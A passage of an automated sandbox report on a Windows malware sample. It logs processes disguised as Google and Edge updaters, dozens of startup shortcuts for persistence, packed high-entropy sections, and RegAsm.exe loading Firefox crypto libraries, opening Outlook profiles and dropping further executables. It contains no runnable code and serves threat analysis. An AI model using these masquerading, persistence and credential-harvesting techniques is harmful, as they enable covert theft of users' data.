                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: scrrun.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: scrrun.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: scrrun.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: scrrun.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: scrrun.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: napinsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: pnrpnsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: wshbth.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: nlaapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: winrnr.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: scrrun.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: scrrun.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: scrrun.dll
                            Source: C:\ProgramData\FIEHIIIJDA.exeSection loaded: mscoree.dll
                            Source: C:\ProgramData\FIEHIIIJDA.exeSection loaded: apphelp.dll
                            Source: C:\ProgramData\FIEHIIIJDA.exeSection loaded: kernel.appcore.dll
                            Source: C:\ProgramData\FIEHIIIJDA.exeSection loaded: version.dll
                            Source: C:\ProgramData\FIEHIIIJDA.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\ProgramData\FIEHIIIJDA.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\ProgramData\FIEHIIIJDA.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                            Source: LKMService_7f7765716ecd48468fd42866f53e185b.lnk.0.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_33e3c96f8f0e451abcf40414b467f00e.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_fa77a108aacc4248a80e0b77d9590ff7.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_1f7c1c49e34e415cab27193ab44807e0.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_9d20ef342720412b8e70c55d8f3213a0.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_2248f20f044f4c4cbee8f92a4524a738.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_48ccaff91cd041ae80361f511486590f.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_2aa1c12a23cf42629c5248e0898582f5.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_61b2706f85d14fec9c863d1fe733f363.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_184c5b243f6e4357a0e976190a4f7cb3.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                            Source: LKMService_66b58aade5ea4867b44220c6fa235449.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_c92e0f63f6584d9f81176fd36293b446.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_03e867621a2c492fbfe23aa0225bca09.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_35ee50e71e6c4619b71b70b242ae8ac6.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_882f2ea546114f569d41d630426c0bbc.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_ebae18e01c0b4596ae53abe0c92bbefb.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_31e0f9699af5449dbbe1811f9f2a862a.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_8e8ecdc88e2d46cfa55c46f7693e1dfd.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_e857420dceee46fb954a73994ced1226.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_e4cf168250ea4406a6a1577cb51c9ce2.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_523c6ede001f4d268d715ccc1fa5fb3a.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_cd5ef6ce168c438996448b48dcaf4d98.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_1a522d1817c644eaa1a640b7dd1d131c.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_3403f693031745c8b85a66353f3ace7e.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_90b565cfb8d5467eb01c0089fa4d1a69.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_8cf57d72702e40c3b0a61c02602e4129.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_bf5e484fccdf4c3a962baa6cdbdb684a.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_b79c001705c7471c9b09da7c8889443b.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_2234a4242580420787d55bfd4dcf2a4c.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_a646bd2097034060960970137187629f.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_ce6e443813a54514b9787afeecbaa12b.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_657ff44e105c473b8853327459bcb359.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_feba33a9d8824e9086cf3b9956b004f1.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_fbd8d13802b7486295921513e688aa8e.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_27cbb7ed26514b6aa95ad6d80834ca4b.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_a3686568f4ba4794b959cf373d8966f0.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: LKMService_9ec753f0a9ec4c1cbaafc018f53c78c1.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000013.00000002.2847784623.000000006BE5D000.00000002.00000001.01000000.00000011.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: freebl3.pdb source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: LKMService.exe, 00000007.00000002.2290894596.0000000001233000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2373356636.0000000001078000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: LKMService.exe, 00000017.00000002.2453266873.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb! source: LKMService.exe, 00000017.00000002.2453266873.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000013.00000002.2838853417.000000006BC7F000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.19.dr
                            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb\ source: LKMService.exe, 00000017.00000002.2453266873.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: GoogleUpdater.exe, 00000012.00000002.2373356636.0000000001078000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: GoogleUpdater.exe, 00000012.00000002.2373356636.0000000001078000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 00000017.00000002.2453266873.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\mscorlib.pdbR source: GoogleUpdater.exe, 00000012.00000002.2373356636.0000000001078000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: LKMService.exe, 00000007.00000002.2290894596.0000000001263000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\System.pdb# source: LKMService.exe, 00000017.00000002.2453266873.0000000000F0C000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: softokn3.pdb@ source: RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.dr
                            Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000023.00000002.3092204683.000000003AD1A000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: LKMService.exe, 00000017.00000002.2453266873.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000023.00000002.3078174004.000000002EE39000.00000004.00000020.00020000.00000000.sdmp, msvcp140[1].dll.19.dr
                            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.PDB7 source: LKMService.exe, 00000017.00000002.2453266873.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbM>t source: LKMService.exe, 00000017.00000002.2453266873.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000013.00000002.2847784623.000000006BE5D000.00000002.00000001.01000000.00000011.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbfq source: LKMService.exe, 00000017.00000002.2453266873.0000000000F0C000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\System.pdb source: LKMService.exe, 00000007.00000002.2290894596.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2373356636.0000000001078000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 00000017.00000002.2453266873.0000000000F0C000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: LKSM.pdb source: file.exe, 00000000.00000002.2124493240.0000000002C90000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\mscorlib.pdbb source: GoogleUpdater.exe, 00000012.00000002.2373356636.0000000001078000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: LKMService.exe, 00000007.00000002.2290894596.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 00000017.00000002.2453266873.0000000000F0C000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\mscorlib.pdb(z source: LKMService.exe, 00000007.00000002.2290894596.00000000011A6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdburat source: LKMService.exe, 00000007.00000002.2290894596.00000000011A6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\System.Core.pdbF> source: LKMService.exe, 00000017.00000002.2453266873.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: freebl3.pdbp source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\dll\System.pdb source: LKMService.exe, 00000007.00000002.2290894596.0000000001263000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: mscorlib.pdb source: LKMService.exe, 00000017.00000002.2505868036.0000000007A30000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: LKMService.exe, 00000007.00000002.2290894596.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2373356636.0000000001078000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 00000017.00000002.2453266873.0000000000F0C000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: mscorlib.pdb-b source: GoogleUpdater.exe, 00000012.00000002.2373356636.000000000110C000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: LKSM.pdbt source: file.exe, 00000000.00000002.2124493240.0000000002C90000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\System.Core.pdb source: GoogleUpdater.exe, 00000012.00000002.2373356636.0000000001078000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: LKMService.exe, 00000007.00000002.2290894596.0000000001233000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb5 source: LKMService.exe, 00000007.00000002.2290894596.0000000001233000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: LKMService.exe, 00000017.00000002.2453266873.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: LKMService.exe, 00000007.00000002.2290894596.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 00000017.00000002.2453266873.0000000000F0C000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.Core.pdb source: GoogleUpdater.exe, 00000012.00000002.2373356636.000000000110C000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: nss3.pdb source: RegAsm.exe, 00000013.00000002.2838853417.000000006BC7F000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.19.dr
                            Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000014.00000002.3239362051.0000000005D4B000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3032719149.000000001CA78000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3058816832.00000000229E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3477129687.000000002299B000.00000002.00001000.00020000.00000000.sdmp
                            Source: Binary string: softokn3.pdb source: RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.dr
                            Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: LKMService.exe, 00000007.00000002.2290894596.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2373356636.0000000001078000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: LKMService.exe, 00000017.00000002.2453266873.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbQ source: LKMService.exe, 00000007.00000002.2290894596.0000000001263000.00000004.00000020.00020000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            Detected unpacking (changes PE section rights)
                            Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.b10000.0.unpack Z Hi?:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_00419860
                            Source: ZNiWLZA4sT3dAjz_lF65fVs6.exe.6.drStatic PE information: real checksum: 0x537d7 should be: 0x61364
                            Source: LKMService.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x2d9b0
                            Source: 66fbfccd837ac_vadggdsa[1].exe.6.drStatic PE information: real checksum: 0x695a1 should be: 0x6a530
                            Source: f98ae5e6665140c7bc7a10ef5c598fcb.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x1eceb1
                            Source: file.exeStatic PE information: real checksum: 0x0 should be: 0x2d9b0
                            Source: GoogleUpdater.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x2d9b0
                            Source: 66fbfcc301a31_swws[1].exe.6.drStatic PE information: real checksum: 0x537d7 should be: 0x61364
                            Source: E4aR4O9hOTF5WJfvKNpcVCp8.exe.6.drStatic PE information: real checksum: 0x695a1 should be: 0x6a530
                            Source: file.exeStatic PE information: section name: Z Hi?
                            Source: file.exeStatic PE information: section name:
                            Source: LKMService.exe.0.drStatic PE information: section name: Z Hi?
                            Source: LKMService.exe.0.drStatic PE information: section name:
                            Source: GoogleUpdater.exe.2.drStatic PE information: section name: Z Hi?
                            Source: GoogleUpdater.exe.2.drStatic PE information: section name:
                            Source: freebl3.dll.19.drStatic PE information: section name: .00cfg
                            Source: freebl3[1].dll.19.drStatic PE information: section name: .00cfg
                            Source: mozglue.dll.19.drStatic PE information: section name: .00cfg
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B285AC pushfd ; ret 0_2_00B285D0
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B23F86 push esi; retf 0_2_00B23F91
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B24904 push cs; retf 0_2_00B24912
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B26142 push edi; ret 0_2_00B26143
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04E329FE push 69470E7Dh; ret 0_2_04E32A03
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_017F4DF7 push edi; ret 2_2_017F4DF8
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 2_2_058BD443 push cs; iretd 2_2_058BD444
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 3_2_00EC4DF7 push edi; ret 3_2_00EC4DF8
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 3_2_00ECC6E4 push ebp; iretd 3_2_00ECC6EA
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 3_2_00ECC79C pushfd ; iretd 3_2_00ECC79D
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 3_2_06862083 push es; iretd 3_2_068620A0
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 3_2_068629FE push 69470E7Dh; ret 3_2_06862A03
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_005662B0 push ecx; ret 6_2_005662C3
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00460312 push eax; iretd 6_2_0046031A
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0046158E push ds; retn 0008h6_2_0046158F
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeCode function: 7_2_01404DF7 push edi; ret 7_2_01404DF8
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_02DE4DF7 push edi; ret 18_2_02DE4DF8
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04E429FE push 69470E7Dh; ret 18_2_04E42A03
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041B035 push ecx; ret 19_2_0041B048
                            Source: file.exeStatic PE information: section name: Z Hi? entropy: 7.998136765903576
                            Source: LKMService.exe.0.drStatic PE information: section name: Z Hi? entropy: 7.998136765903576
                            Source: f98ae5e6665140c7bc7a10ef5c598fcb.exe.2.drStatic PE information: section name: .text entropy: 7.999715150656324
                            Source: GoogleUpdater.exe.2.drStatic PE information: section name: Z Hi? entropy: 7.998136765903576
                            Source: 66fbfcc301a31_swws[1].exe.6.drStatic PE information: section name: .text entropy: 7.993937543381739
                            Source: ZNiWLZA4sT3dAjz_lF65fVs6.exe.6.drStatic PE information: section name: .text entropy: 7.993937543381739
                            Source: 66fbfccd837ac_vadggdsa[1].exe.6.drStatic PE information: section name: .text entropy: 7.995853836897514
                            Source: E4aR4O9hOTF5WJfvKNpcVCp8.exe.6.drStatic PE information: section name: .text entropy: 7.995853836897514

                            Persistence and Installation Behavior

                            barindex
                            Drops PE files to the document folder of the user
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66fbfcc9963ca_ldfsna[1].exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66fbfcc9963ca_ldfsna[1].exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dllJump to dropped file
